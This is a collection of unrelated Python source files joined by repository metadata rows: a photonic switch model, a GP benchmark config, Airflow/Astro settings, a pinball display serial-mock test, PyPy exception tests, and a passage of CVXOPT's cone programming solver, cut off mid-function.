self.add_port(name='in0', kind=port.kind.optical, direction=port.direction.inp)
self.add_port(name='in1', kind=port.kind.optical, direction=port.direction.inp)
self.add_port(name='out0', kind=port.kind.optical, direction=port.direction.out)
self.add_port(name='out1', kind=port.kind.optical, direction=port.direction.out)
state = self.add_port(name='state', kind=port.kind.digital,
direction=port.direction.inp)
# Lagrange polynomial
s,er,tx = state,extinction_ratio,10**(-loss_dB/10)
r = (s-0)/(1-0)*(1-1/er) + (s-1)/(0-1)*(1/er)
M = sqrt(tx) * Matrix([
[sqrt(r), I*sqrt(1 - r)],
[I*sqrt(1 - r), sqrt(r)] ])
self.add_model(Linear('simple switch '+self.name, block=self, unitary_matrix=M))
class ThermoOpticPhaseShifterBasicRT(Block):
"""
Due to Dario, based on https://doi.org/10.1364/OE.27.010456
"""
reference_prefix = "TOPM"
def define(self, device_length=None, centre_wavelength=2.0E-6, ref_index_temp_func=lambda T:1.0*T, R=None):
"""
thermooptic_coeff: constant thermo-optic coefficient
i0: input port current
v0: input port voltage
"""
A,B,C,D = 1,-R,0,1
M = Matrix([[A,B],[C,D]])
inp = self.add_port(name='inp', kind=port.kind.optical, direction=port.direction.inp)
out = self.add_port(name='out', kind=port.kind.optical, direction=port.direction.out)
i0 = self.add_port(name='i0', kind=port.kind.voltage, direction=port.direction.inp)
v0 = self.add_port(name='v0', kind=port.kind.current, direction=port.direction.inp)
i1 = self.add_port(name='i1', kind=port.kind.voltage, direction=port.direction.out)
v1 = self.add_port(name='v1', kind=port.kind.current, direction=port.direction.out)
T = self.add_port(name='T', kind=port.kind.temperature, direction=port.direction.inp)
oes = {
out: exp(I* (2*pi*device_length/centre_wavelength)*ref_index_temp_func(T) )*inp,
v1: +A*v0 + B*i0,
i1: -C*v0 - D*i0}
self.add_model(SymbolicModel('simple phase '+self.name, block=self, out_exprs=oes))
| 31.6375 | 108 | 0.694192 |
4adad49ce125817a0ee4811588e969da354c738c | 397 | py | Python | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | null | null | null | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | 10 | 2021-06-25T15:10:26.000Z | 2021-07-15T12:50:21.000Z | safergpy/code/bench/exps_config/restart_methods/gpy_mle1123.py | johncoltrane1/saferGPMLE | b86fbd329eaad0b6374a1b28cae43b2a7f81eb61 | [
"BSD-3-Clause"
] | 3 | 2021-06-16T07:39:05.000Z | 2022-03-16T09:31:55.000Z | method_args = {
"param": "log",
"init": "scaled_anisotropic_init",
"stopping_criterion": "strict",
"do_profiling": True,
"optim_scheme": [[1 + 19 * 50, 0.35**2]],
"bench_type": "monte-carlo",
}
| 44.111111 | 63 | 0.319899 |
357faa371768341f397d10bddaf919fe8e85d4ba | 122 | py | Python | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 71 | 2021-12-06T22:41:59.000Z | 2022-03-31T21:47:16.000Z | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 171 | 2021-12-14T07:34:57.000Z | 2022-03-31T21:04:15.000Z | src/astro/settings.py | jlaneve/astro | 4528162c7582f3860d1d21de7af954f20c9f9a6a | [
"Apache-2.0"
] | 11 | 2021-12-06T22:46:23.000Z | 2022-03-31T18:09:46.000Z | import os
from astro.constants import DEFAULT_SCHEMA
SCHEMA = os.getenv("AIRFLOW__ASTRO__SQL_SCHEMA") or DEFAULT_SCHEMA
| 20.333333 | 66 | 0.836066 |
cd003e8bdfa3af1fed760fab6559d797dcddb604 | 4,710 | py | Python | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | mpf/tests/test_MyPinballs.py | Wolfmarsh/mpf | ad71f381ce8a0e65f28958e51cf8a8b38a6154fb | [
"MIT"
] | null | null | null | """Test MyPinballs Platform."""
import time
from mpf.tests.MpfTestCase import MpfTestCase
from mpf.tests.loop import MockSerial
class MockMypinballsSocket(MockSerial):
"""Serial mock."""
def read(self, length):
"""Read from serial."""
del length
if not self.queue:
return b''
msg = self.queue.pop()
return msg
def read_ready(self):
"""True if ready to read."""
return bool(self.queue)
def write_ready(self):
"""True if ready to write."""
return True
def write(self, msg):
"""Write message."""
if msg in self.permanent_commands and msg not in self.expected_commands:
self.queue.append(self.permanent_commands[msg])
return len(msg)
# print("Serial received: " + "".join("\\x%02x" % b for b in msg) + " len: " + str(len(msg)))
if msg not in self.expected_commands:
self.crashed = True
# print("Unexpected command: " + msg.decode() + "".join("\\x%02x" % b for b in msg) +
# " len: " + str(len(msg)))
raise AssertionError("Unexpected command: " + msg.decode() + "".join("\\x%02x" % b for b in msg) +
" len: " + str(len(msg)))
if self.expected_commands[msg] is not False:
self.queue.append(self.expected_commands[msg])
del self.expected_commands[msg]
return len(msg)
def __init__(self):
super().__init__()
self.name = "SerialMock"
self.expected_commands = {}
self.queue = []
self.permanent_commands = {}
self.crashed = False
class MyPinballsPlatformTest(MpfTestCase):
def get_config_file(self):
return 'config.yaml'
def get_machine_path(self):
return 'tests/machine_files/mypinballs/'
def _mock_loop(self):
self.clock.mock_serial("/dev/ttyUSB0", self.serialMock)
def tearDown(self):
self.assertFalse(self.serialMock.crashed)
super().tearDown()
def get_platform(self):
return False
def _wait_for_processing(self):
start = time.time()
while self.serialMock.expected_commands and not self.serialMock.crashed and time.time() < start + 10:
self.advance_time_and_run(.01)
def setUp(self):
self.serialMock = MockMypinballsSocket()
# all display are reset at startup
self.serialMock.expected_commands = {
b'3:1\n': False,
b'3:2\n': False,
b'3:6\n': False,
}
self.serialMock.permanent_commands = {}
super().setUp()
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
def testPlatform(self):
self.serialMock.expected_commands = {
b'1:1:1234\n': False,
}
self.machine.segment_displays["display1"].add_text("1234", key="score")
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
# change text (with same key)
self.serialMock.expected_commands = {
b'1:1:1337\n': False,
}
self.machine.segment_displays["display1"].add_text("1337", key="score")
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
# change text (with same key)
self.serialMock.expected_commands = {
b'1:1:42?23\n': False,
}
self.machine.segment_displays["display1"].add_text("42 23", key="score")
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
# set to empty
self.serialMock.expected_commands = {
b'3:1\n': False,
}
self.machine.segment_displays["display1"].remove_text_by_key("score")
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
self.serialMock.expected_commands = {
b'1:2:424242\n': False,
}
self.machine.segment_displays["display2"].add_text("424242")
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
self.serialMock.expected_commands = {
b'2:2:424242\n': False,
}
self.machine.segment_displays["display2"].set_flashing(True)
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
self.serialMock.expected_commands = {
b'1:2:424242\n': False,
}
self.machine.segment_displays["display2"].set_flashing(False)
self._wait_for_processing()
self.assertFalse(self.serialMock.expected_commands)
| 31.4 | 110 | 0.606369 |
a3fdd844f485f87358cf4a8e68029866530b4058 | 246 | py | Python | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | pypiserver/__main__.py | sposs/pypiserver | 39316bb56a7960c75c81f60100a1b180f670cb73 | [
"Unlicense",
"MIT"
] | null | null | null | if __name__ == "__main__":
if __package__ == "": # running as python pypiserver-...whl/pypiserver?
import sys, os
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from pypiserver import core
core.main()
| 35.142857 | 76 | 0.650407 |
4e7dd8256c7fec06fc7e27edb6df901a3221df13 | 187 | py | Python | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | examples/telegram-send/info-get-chat-id.py | relikd/botlib | d0c5072d27db1aa3fad432457c90c9e3f23f22cc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from botlib.tgclient import TGClient
print('open a new telegram chat window with your bot and send /start')
TGClient.listen_chat_info(__API_KEY__, 'my-username')
| 26.714286 | 70 | 0.786096 |
17c18d5346133caac81425008b367ea1e0dc9dfe | 1,631 | py | Python | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | pypy/interpreter/test/apptest_exceptions.py | alexmechanic/pypy | 6b1511399cb6f174e408ca74e8046c49e98fcc8c | [
"Apache-2.0",
"OpenSSL"
] | 1 | 2022-03-30T11:42:37.000Z | 2022-03-30T11:42:37.000Z | import pytest
def test_yield_in_nested_try_excepts():
#Issue #25612
class MainError(Exception):
pass
class SubError(Exception):
pass
def main():
try:
raise MainError()
except MainError:
try:
yield
except SubError:
pass
raise
coro = main()
coro.send(None)
with pytest.raises(MainError):
coro.throw(SubError())
def test_generator_doesnt_retain_old_exc2():
pytest.skip("broken right now :-(")
# Issue bpo 28884#msg282532
# Fixed in CPython via https://github.com/python/cpython/pull/1773
import sys
def g():
try:
raise ValueError
except ValueError:
yield 1
assert sys.exc_info() == (None, None, None)
yield 2
gen = g()
try:
raise IndexError
except IndexError:
assert next(gen) == 1
assert next(gen) == 2
def test_raise_in_generator():
#Issue 25612#msg304117
def g():
yield 1
raise
yield 2
with pytest.raises(ZeroDivisionError):
i = g()
try:
1/0
except:
next(i)
next(i)
def test_assertion_error_global_ignored():
if hasattr(pytest, 'py3k_skip'):
pytest.py3k_skip('only untranslated')
global AssertionError
class Foo(Exception):
pass
OrigAssertionError = AssertionError
AssertionError = Foo
try:
with pytest.raises(OrigAssertionError): # not Foo!
assert 0
finally:
AssertionError = OrigAssertionError
| 21.460526 | 70 | 0.568976 |
244e54d7fb03d6cb54fbbbfcefa97357bde887ca | 168,050 | py | Python | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | venv/lib/python3.7/site-packages/cvxopt/coneprog.py | JWThacker/Airbnb_project | f804495512f0f924d3048f788ed33ab230b4e02a | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | """
Solver for linear and quadratic cone programs.
"""
# Copyright 2012-2021 M. Andersen and L. Vandenberghe.
# Copyright 2010-2011 L. Vandenberghe.
# Copyright 2004-2009 J. Dahl and L. Vandenberghe.
#
# This file is part of CVXOPT.
#
# CVXOPT is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# CVXOPT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if sys.version > '3': long = int
__all__ = []
options = {}
def conelp(c, G, h, dims = None, A = None, b = None, primalstart = None,
dualstart = None, kktsolver = None, xnewcopy = None, xdot = None,
xaxpy = None, xscal = None, ynewcopy = None, ydot = None, yaxpy = None,
yscal = None, **kwargs):
"""
Solves a pair of primal and dual cone programs
minimize c'*x
subject to G*x + s = h
A*x = b
s >= 0
maximize -h'*z - b'*y
subject to G'*z + A'*y + c = 0
z >= 0.
The inequalities are with respect to a cone C defined as the Cartesian
product of N + M + 1 cones:
C = C_0 x C_1 x .... x C_N x C_{N+1} x ... x C_{N+M}.
The first cone C_0 is the nonnegative orthant of dimension ml.
The next N cones are second order cones of dimension mq[0], ...,
mq[N-1]. The second order cone of dimension m is defined as
{ (u0, u1) in R x R^{m-1} | u0 >= ||u1||_2 }.
The next M cones are positive semidefinite cones of order ms[0], ...,
ms[M-1] >= 0.
Input arguments (basic usage).
c is a dense 'd' matrix of size (n,1).
dims is a dictionary with the dimensions of the components of C.
It has three fields.
- dims['l'] = ml, the dimension of the nonnegative orthant C_0.
(ml >= 0.)
- dims['q'] = mq = [ mq[0], mq[1], ..., mq[N-1] ], a list of N
integers with the dimensions of the second order cones C_1, ...,
C_N. (N >= 0 and mq[k] >= 1.)
- dims['s'] = ms = [ ms[0], ms[1], ..., ms[M-1] ], a list of M
integers with the orders of the semidefinite cones C_{N+1}, ...,
C_{N+M}. (M >= 0 and ms[k] >= 0.)
The default value of dims is {'l': G.size[0], 'q': [], 's': []}.
G is a dense or sparse 'd' matrix of size (K,n), where
K = ml + mq[0] + ... + mq[N-1] + ms[0]**2 + ... + ms[M-1]**2.
Each column of G describes a vector
v = ( v_0, v_1, ..., v_N, vec(v_{N+1}), ..., vec(v_{N+M}) )
in V = R^ml x R^mq[0] x ... x R^mq[N-1] x S^ms[0] x ... x S^ms[M-1]
stored as a column vector
[ v_0; v_1; ...; v_N; vec(v_{N+1}); ...; vec(v_{N+M}) ].
Here, if u is a symmetric matrix of order m, then vec(u) is the
matrix u stored in column major order as a vector of length m**2.
We use BLAS unpacked 'L' storage, i.e., the entries in vec(u)
corresponding to the strictly upper triangular entries of u are
not referenced.
h is a dense 'd' matrix of size (K,1), representing a vector in V,
in the same format as the columns of G.
A is a dense or sparse 'd' matrix of size (p,n). The default value
is a sparse 'd' matrix of size (0,n).
b is a dense 'd' matrix of size (p,1). The default value is a
dense 'd' matrix of size (0,1).
The argument primalstart is a dictionary with keys 'x', 's'. It
specifies an optional primal starting point.
- primalstart['x'] is a dense 'd' matrix of size (n,1).
- primalstart['s'] is a dense 'd' matrix of size (K,1),
representing a vector that is strictly positive with respect
to the cone C.
The argument dualstart is a dictionary with keys 'y', 'z'. It
specifies an optional dual starting point.
- dualstart['y'] is a dense 'd' matrix of size (p,1).
- dualstart['z'] is a dense 'd' matrix of size (K,1), representing
a vector that is strictly positive with respect to the cone C.
It is assumed that rank(A) = p and rank([A; G]) = n.
The other arguments are normally not needed. They make it possible
to exploit certain types of structure, as described below.
Output arguments.
Returns a dictionary with keys 'status', 'x', 's', 'z', 'y',
'primal objective', 'dual objective', 'gap', 'relative gap',
'primal infeasibility', 'dual infeasibility', 'primal slack',
'dual slack', 'residual as primal infeasibility certificate',
'residual as dual infeasibility certificate', 'iterations'.
The 'status' field has values 'optimal', 'primal infeasible',
'dual infeasible', or 'unknown'. The 'iterations' field is the
number of iterations taken. The values of the other fields depend
on the exit status.
Status 'optimal'.
- 'x', 's', 'y', 'z' are an approximate solution of the primal and
dual optimality conditions
G*x + s = h, A*x = b
G'*z + A'*y + c = 0
s >= 0, z >= 0
s'*z = 0.
- 'primal objective': the primal objective c'*x.
- 'dual objective': the dual objective -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if
the primal objective is negative, s'*z / -(h'*z + b'*y) if the
dual objective is positive, and None otherwise.
- 'primal infeasibility': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e },
where
e = ( e_0, e_1, ..., e_N, e_{N+1}, ..., e_{M+N} )
is the identity vector in C. e_0 is an ml-vector of ones,
e_k, k = 1,..., N, are unit vectors (1,0,...,0) of length mq[k],
and e_k = vec(I) where I is the identity matrix of order ms[k].
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate': None.
The primal infeasibility is guaranteed to be less than
solvers.options['feastol'] (default 1e-7). The dual infeasibility
is guaranteed to be less than solvers.options['feastol']
(default 1e-7). The gap is less than solvers.options['abstol']
(default 1e-7) or the relative gap is less than
solvers.options['reltol'] (default 1e-6).
Status 'primal infeasible'.
- 'x', 's': None.
- 'y', 'z' are an approximate certificate of infeasibility
-h'*z - b'*y = 1, G'*z + A'*y = 0, z >= 0.
- 'primal objective': None.
- 'dual objective': 1.0.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': None.
- 'dual slack': the smallest dual slack, sup {t | z >= t*e }.
- 'residual as primal infeasibility certificate': the residual in
the condition of the infeasibility certificate, defined as
|| G'*z + A'*y || / max(1, ||c||).
- 'residual as dual infeasibility certificate': None.
The residual as primal infeasiblity certificate is guaranteed
to be less than solvers.options['feastol'] (default 1e-7).
Status 'dual infeasible'.
- 'x', 's' are an approximate proof of dual infeasibility
c'*x = -1, G*x + s = 0, A*x = 0, s >= 0.
- 'y', 'z': None.
- 'primal objective': -1.0.
- 'dual objective': None.
- 'gap', 'relative gap': None.
- 'primal infeasibility' and 'dual infeasibility': None.
- 'primal slack': the smallest primal slack, sup {t | s >= t*e}.
- 'dual slack': None.
- 'residual as primal infeasibility certificate': None.
- 'residual as dual infeasibility certificate: the residual in
the conditions of the infeasibility certificate, defined as
the maximum of
|| G*x + s || / max(1, ||h||) and || A*x || / max(1, ||b||).
The residual as dual infeasiblity certificate is guaranteed
to be less than solvers.options['feastol'] (default 1e-7).
Status 'unknown'.
- 'x', 'y', 's', 'z' are the last iterates before termination.
These satisfy s > 0 and z > 0, but are not necessarily feasible.
- 'primal objective': the primal cost c'*x.
- 'dual objective': the dual cost -h'*z - b'*y.
- 'gap': the duality gap s'*z.
- 'relative gap': the relative gap, defined as s'*z / -c'*x if the
primal cost is negative, s'*z / -(h'*z + b'*y) if the dual cost
is positive, and None otherwise.
- 'primal infeasibility ': the residual in the primal constraints,
defined as the maximum of the residual in the inequalities
|| G*x + s + h || / max(1, ||h||)
and the residual in the equalities
|| A*x - b || / max(1, ||b||).
- 'dual infeasibility': the residual in the dual constraints,
defined as
|| G'*z + A'*y + c || / max(1, ||c||).
- 'primal slack': the smallest primal slack, sup {t | s >= t*e}.
- 'dual slack': the smallest dual slack, sup {t | z >= t*e}.
- 'residual as primal infeasibility certificate': None if
h'*z + b'*y >= 0; the residual
|| G'*z + A'*y || / ( -(h'*z + b'*y) * max(1, ||c||) )
otherwise.
- 'residual as dual infeasibility certificate':
None if c'*x >= 0; the maximum of the residuals
|| G*x + s || / ( -c'*x * max(1, ||h||) )
and
|| A*x || / ( -c'*x * max(1, ||b||) )
otherwise.
Termination with status 'unknown' indicates that the algorithm
failed to find a solution that satisfies the specified tolerances.
In some cases, the returned solution may be fairly accurate. If
the primal and dual infeasibilities, the gap, and the relative gap
are small, then x, y, s, z are close to optimal. If the residual
as primal infeasibility certificate is small, then
y / (-h'*z - b'*y), z / (-h'*z - b'*y)
provide an approximate certificate of primal infeasibility. If
the residual as certificate of dual infeasibility is small, then
x / (-c'*x), s / (-c'*x)
provide an approximate proof of dual infeasibility.
Advanced usage.
Three mechanisms are provided to express problem structure.
1. The user can provide a customized routine for solving linear
equations (`KKT systems')
[ 0 A' G' ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W'*W ] [ uz ] [ bz ]
W is a scaling matrix, a block diagonal mapping
W*z = ( W0*z_0, ..., W_{N+M}*z_{N+M} )
defined as follows.
- For the 'l' block (W_0):
W_0 = diag(d),
with d a positive vector of length ml.
- For the 'q' blocks (W_{k+1}, k = 0, ..., N-1):
W_{k+1} = beta_k * ( 2 * v_k * v_k' - J )
where beta_k is a positive scalar, v_k is a vector in R^mq[k]
with v_k[0] > 0 and v_k'*J*v_k = 1, and J = [1, 0; 0, -I].
- For the 's' blocks (W_{k+N}, k = 0, ..., M-1):
W_k * x = vec(r_k' * mat(x) * r_k)
where r_k is a nonsingular matrix of order ms[k], and mat(x) is
the inverse of the vec operation.
The optional argument kktsolver is a Python function that will be
called as f = kktsolver(W), where W is a dictionary that contains
the parameters of the scaling:
- W['d'] is a positive 'd' matrix of size (ml,1).
- W['di'] is a positive 'd' matrix with the elementwise inverse of
W['d'].
- W['beta'] is a list [ beta_0, ..., beta_{N-1} ]
- W['v'] is a list [ v_0, ..., v_{N-1} ]
- W['r'] is a list [ r_0, ..., r_{M-1} ]
- W['rti'] is a list [ rti_0, ..., rti_{M-1} ], with rti_k the
inverse of the transpose of r_k.
The call f = kktsolver(W) should return a function f that solves
the KKT system by f(x, y, z). On entry, x, y, z contain the
righthand side bx, by, bz. On exit, they contain the solution,
with uz scaled: the argument z contains W*uz. In other words,
on exit, x, y, z are the solution of
[ 0 A' G'*W^{-1} ] [ ux ] [ bx ]
[ A 0 0 ] [ uy ] = [ by ].
[ G 0 -W' ] [ uz ] [ bz ]
2. The linear operators G*u and A*u can be specified by providing
Python functions instead of matrices. This can only be done in
combination with 1. above, i.e., it requires the kktsolver
argument.
If G is a function, the call G(u, v, alpha, beta, trans)
should evaluate the matrix-vector products
v := alpha * G * u + beta * v if trans is 'N'
v := alpha * G' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments have
default values alpha = 1.0, beta = 0.0, trans = 'N'.
If A is a function, the call A(u, v, alpha, beta, trans) should
evaluate the matrix-vectors products
v := alpha * A * u + beta * v if trans is 'N'
v := alpha * A' * u + beta * v if trans is 'T'.
The arguments u and v are required. The other arguments
have default values alpha = 1.0, beta = 0.0, trans = 'N'.
3. Instead of using the default representation of the primal
variable x and the dual variable y as one-column 'd' matrices,
we can represent these variables and the corresponding parameters
c and b by arbitrary Python objects (matrices, lists, dictionaries,
etc.). This can only be done in combination with 1. and 2. above,
i.e., it requires a user-provided KKT solver and an operator
description of the linear mappings. It also requires the arguments
xnewcopy, xdot, xscal, xaxpy, ynewcopy, ydot, yscal, yaxpy. These
arguments are functions defined as follows.
If X is the vector space of primal variables x, then:
- xnewcopy(u) creates a new copy of the vector u in X.
- xdot(u, v) returns the inner product of two vectors u and v in X.
- xscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in X.
- xaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in X.
If this option is used, the argument c must be in the same format
as x, the argument G must be a Python function, the argument A
must be a Python function or None, and the argument kktsolver is
required.
If Y is the vector space of primal variables y:
- ynewcopy(u) creates a new copy of the vector u in Y.
- ydot(u, v) returns the inner product of two vectors u and v in Y.
- yscal(alpha, u) computes u := alpha*u, where alpha is a scalar
and u is a vector in Y.
- yaxpy(u, v, alpha = 1.0) computes v := alpha*u + v for a scalar
alpha and two vectors u and v in Y.
If this option is used, the argument b must be in the same format
as y, the argument A must be a Python function or None, and the
argument kktsolver is required.
Control parameters.
The following control parameters can be modified by adding an
entry to the dictionary options.
options['show_progress'] True/False (default: True)
options['maxiters'] positive integer (default: 100)
options['refinement'] positive integer (default: 0 for problems
with no second-order cone and matrix inequality constraints;
1 otherwise)
options['abstol'] scalar (default: 1e-7 )
options['reltol'] scalar (default: 1e-6)
options['feastol'] scalar (default: 1e-7).
"""
import math
from cvxopt import base, blas, misc, matrix, spmatrix
EXPON = 3
STEP = 0.99
options = kwargs.get('options',globals()['options'])
DEBUG = options.get('debug', False)
KKTREG = options.get('kktreg',None)
if KKTREG is None:
pass
elif not isinstance(KKTREG,(float,int,long)) or KKTREG < 0.0:
raise ValueError("options['kktreg'] must be a nonnegative scalar")
MAXITERS = options.get('maxiters',100)
if not isinstance(MAXITERS,(int,long)) or MAXITERS < 1:
raise ValueError("options['maxiters'] must be a positive integer")
ABSTOL = options.get('abstol',1e-7)
if not isinstance(ABSTOL,(float,int,long)):
raise ValueError("options['abstol'] must be a scalar")
RELTOL = options.get('reltol',1e-6)
if not isinstance(RELTOL,(float,int,long)):
raise ValueError("options['reltol'] must be a scalar")
if RELTOL <= 0.0 and ABSTOL <= 0.0 :
raise ValueError("at least one of options['reltol'] and " \
"options['abstol'] must be positive")
FEASTOL = options.get('feastol',1e-7)
if not isinstance(FEASTOL,(float,int,long)) or FEASTOL <= 0.0:
raise ValueError("options['feastol'] must be a positive scalar")
show_progress = options.get('show_progress', True)
if kktsolver is None:
if dims and (dims['q'] or dims['s']):
kktsolver = 'qr'
else:
kktsolver = 'chol2'
defaultsolvers = ('ldl', 'ldl2', 'qr', 'chol', 'chol2')
if isinstance(kktsolver,str) and kktsolver not in defaultsolvers:
raise ValueError("'%s' is not a valid value for kktsolver" \
%kktsolver)
# Argument error checking depends on level of customization.
customkkt = not isinstance(kktsolver,str)
matrixG = isinstance(G, (matrix, spmatrix))
matrixA = isinstance(A, (matrix, spmatrix))
if (not matrixG or (not matrixA and A is not None)) and not customkkt:
raise ValueError("use of function valued G, A requires a "\
"user-provided kktsolver")
customx = (xnewcopy != None or xdot != None or xaxpy != None or
xscal != None)
if customx and (matrixG or matrixA or not customkkt):
raise ValueError("use of non-vector type for x requires "\
"function valued G, A and user-provided kktsolver")
customy = (ynewcopy != None or ydot != None or yaxpy != None or
yscal != None)
if customy and (matrixA or not customkkt):
raise ValueError("use of non-vector type for y requires "\
"function valued A and user-provided kktsolver")
if not customx and (not isinstance(c,matrix) or c.typecode != 'd' or c.size[1] != 1):
raise TypeError("'c' must be a 'd' matrix with one column")
if not isinstance(h,matrix) or h.typecode != 'd' or h.size[1] != 1:
raise TypeError("'h' must be a 'd' matrix with 1 column")
if not dims: dims = {'l': h.size[0], 'q': [], 's': []}
if not isinstance(dims['l'],(int,long)) or dims['l'] < 0:
raise TypeError("'dims['l']' must be a nonnegative integer")
if [ k for k in dims['q'] if not isinstance(k,(int,long)) or k < 1 ]:
raise TypeError("'dims['q']' must be a list of positive integers")
if [ k for k in dims['s'] if not isinstance(k,(int,long)) or k < 0 ]:
raise TypeError("'dims['s']' must be a list of nonnegative " \
"integers")
refinement = options.get('refinement',None)
if refinement is None:
if dims['q'] or dims['s']:
refinement = 1
else:
refinement = 0
elif not isinstance(refinement,(int,long)) or refinement < 0:
raise ValueError("options['refinement'] must be a nonnegative integer")
cdim = dims['l'] + sum(dims['q']) + sum([k**2 for k in dims['s']])
cdim_pckd = dims['l'] + sum(dims['q']) + sum([k*(k+1)/2 for k in
dims['s']])
cdim_diag = dims['l'] + sum(dims['q']) + sum(dims['s'])
if h.size[0] != cdim:
raise TypeError("'h' must be a 'd' matrix of size (%d,1)" %cdim)
# Data for kth 'q' constraint are found in rows indq[k]:indq[k+1] of G.
indq = [ dims['l'] ]
for k in dims['q']: indq = indq + [ indq[-1] + k ]
# Data for kth 's' constraint are found in rows inds[k]:inds[k+1] of G.
inds = [ indq[-1] ]
for k in dims['s']: inds = inds + [ inds[-1] + k**2 ]
if matrixG:
if G.typecode != 'd' or G.size != (cdim, c.size[0]):
raise TypeError("'G' must be a 'd' matrix of size (%d, %d)"\
%(cdim, c.size[0]))
def Gf(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
misc.sgemv(G, x, y, dims, trans = trans, alpha = alpha,
beta = beta)
else:
Gf = G
if A is None:
if customx or customy:
def A(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
if trans == 'N': pass
else: xscal(beta, y)
else:
A = spmatrix([], [], [], (0, c.size[0]))
matrixA = True
if matrixA:
if A.typecode != 'd' or A.size[1] != c.size[0]:
raise TypeError("'A' must be a 'd' matrix with %d columns "\
%c.size[0])
def Af(x, y, trans = 'N', alpha = 1.0, beta = 0.0):
base.gemv(A, x, y, trans = trans, alpha = alpha, beta = beta)
else:
Af = A
if not customy:
if b is None: b = matrix(0.0, (0,1))
if not isinstance(b,matrix) or b.typecode != 'd' or b.size[1] != 1:
raise TypeError("'b' must be a 'd' matrix with one column")
if matrixA and b.size[0] != A.size[0]:
raise TypeError("'b' must have length %d" %A.size[0])
else:
if b is None:
raise ValueError("use of non vector type for y requires b")
# kktsolver(W) returns a routine for solving 3x3 block KKT system
#
# [ 0 A' G'*W^{-1} ] [ ux ] [ bx ]
# [ A 0 0 ] [ uy ] = [ by ].
# [ G 0 -W' ] [ uz ] [ bz ]
if kktsolver in defaultsolvers:
if KKTREG is None and (b.size[0] > c.size[0] or b.size[0] + cdim_pckd < c.size[0]):
raise ValueError("Rank(A) < p or Rank([G; A]) < n")
if kktsolver == 'ldl':
factor = misc.kkt_ldl(G, dims, A, kktreg = KKTREG)
elif kktsolver == 'ldl2':
factor = misc.kkt_ldl2(G, dims, A)
elif kktsolver == 'qr':
factor = misc.kkt_qr(G, dims, A)
elif kktsolver == 'chol':
factor = misc.kkt_chol(G, dims, A)
else:
factor = misc.kkt_chol2(G, dims, A)
def kktsolver(W):
return factor(W)
# res() evaluates residual in 5x5 block KKT system
#
